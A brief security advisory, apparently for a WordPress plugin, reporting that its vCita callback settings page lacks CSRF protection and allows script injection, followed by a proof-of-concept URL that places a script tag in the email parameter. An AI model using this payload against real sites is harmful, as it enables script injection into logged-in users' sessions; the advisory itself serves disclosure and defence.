The plugin does not protect the live-site-parse-vcita-callback settings page against CSRF attacks, allowing an unauthenticated attacker to inject arbitrary web scripts by tricking a logged in user with contributor role or higher to click a link.
https://example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>